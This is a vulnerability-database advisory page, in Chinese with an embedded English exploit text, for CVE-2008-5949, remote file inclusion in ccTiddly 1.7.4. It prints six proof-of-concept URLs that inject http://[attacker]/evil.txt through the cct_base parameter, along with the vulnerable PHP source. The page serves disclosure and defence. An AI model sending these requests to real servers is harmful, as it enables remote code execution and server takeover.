tiddlywiki cctiddly PHP远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1116939 漏洞类型 代码注入
发布时间 2008-12-04 更新时间 2009-01-26
CVE编号 CVE-2008-5949 CNNVD-ID CNNVD-200901-306
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/7336
https://cxsecurity.com/issue/WLB-2009010197
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200901-306
|漏洞详情
ccTiddly1.7.4和1.7.6版本中存在多个PHP远程文件包含漏洞。远程攻击者可以借助一个URL,执行任意的PHP代码。该URL存在于对includes/中的(1)index.php;(2)handle/proxy.php;(3)header.php;(4)include.php;(5)workspace.php和(6)plugins/RSS/files/rss.php的cct_bas参数中。
|漏洞EXP
/*

	$Id: cctiddly-1.7.4-rfi.txt,v 0.1 2008/12/04 04:12:20 cOndemned Exp $

	ccTiddly 1.7.4 (cct_base) Multiple Remote File Inclusion Vulnerabilities
	found by cOndemned
	
	download from : http://tiddlywiki.org/ccTiddly/ccTiddly_v1.7.4.zip
	
	Probably prior versions are vulnerable too...

	Greetz: ZaBeaTy, str0ke, TBH, Avantura

*/


0x01 :
	file : 
		/index.php
	poc : 
		http://[host]/[cctiddly_path]/index.php?cct_base=http://[attacker]/evil.txt?
	source :  

		18.	//includes
		19.	if(!isset($cct_base))
		20.		$cct_base = "";
		21.
		22.	include_once($cct_base."includes/header.php");
		23.	include_once($cct_base."includes/login.php");	
	
0x02 :

	file :
		/handle/proxy.php
	poc :
		http://[host]/[cctiddly_path]/handle/proxy.php?cct_base=http://[attacker]/evil.txt?
	source :

		3.	if(!isset($cct_base)) 
		4.		$cct_base= "../";
		5.	include_once($cct_base."includes/header.php");
		6.	include_once($cct_base."includes/config.php");

0x03 :

	file :
		/includes/header.php
	poc :
		http://[host]/[cctiddly_path]/handle/includes/header.php?cct_base=http://[attacker]/evil.txt?
	source :

		5.	if(!isset($cct_base)) 
		6.		$cct_base= "";
		7.	include_once($cct_base."includes/functions.php");
		8.	include_once($cct_base."includes/config.php");
		9.	include_once($cct_base."includes/pluginLoader.php");
		10.	include_once($cct_base."lang/".$tiddlyCfg['pref']['language']."/language.php");
		11.	//include is used because language file is included once in config.php file
		12.	include_once($cct_base."includes/tiddler.php");
		13.	include_once($cct_base."includes/user.php");

0x04 :

	file :
		/includes/include.php
	poc :
		http://[host]/[cctiddly_path]/includes/include.php?cct_base=http://[attacker]/evil.txt?
	source :

		3.	include_once($cct_base."includes/ccAssignments.php");

0x05 :

	file :
		/includes/workspace.php	
	poc :
		http://[host]/[cctiddly_path]/includes/workspace.php?cct_base=http://[attacker]/evil.txt?
	source :
		3.	include_once($cct_base."includes/header.php");
		4.	include_once($cct_base."includes/user.php");
		5.	include_once($cct_base."includes/tiddler.php");

0x06 :

	file :
		/plugins/RSS/files/rss.php
	poc :
		http://[host]/[cctiddly_path]/plugins/RSS/files/rss.php?cct_base=http://[attacker]/evil.txt?
	source :

		3.	include_once($cct_base."includes/header.php");
		
EoF.

# milw0rm.com [2008-12-04]
|参考资料

来源:XF
名称:cctiddly-cctbase-file-include(47072)
链接:http://xforce.iss.net/xforce/xfdb/47072
来源:BID
名称:32631
链接:http://www.securityfocus.com/bid/32631
来源:MILW0RM
名称:7336
链接:http://www.milw0rm.com/exploits/7336
来源:SECUNIA
名称:32995
链接:http://secunia.com/advisories/32995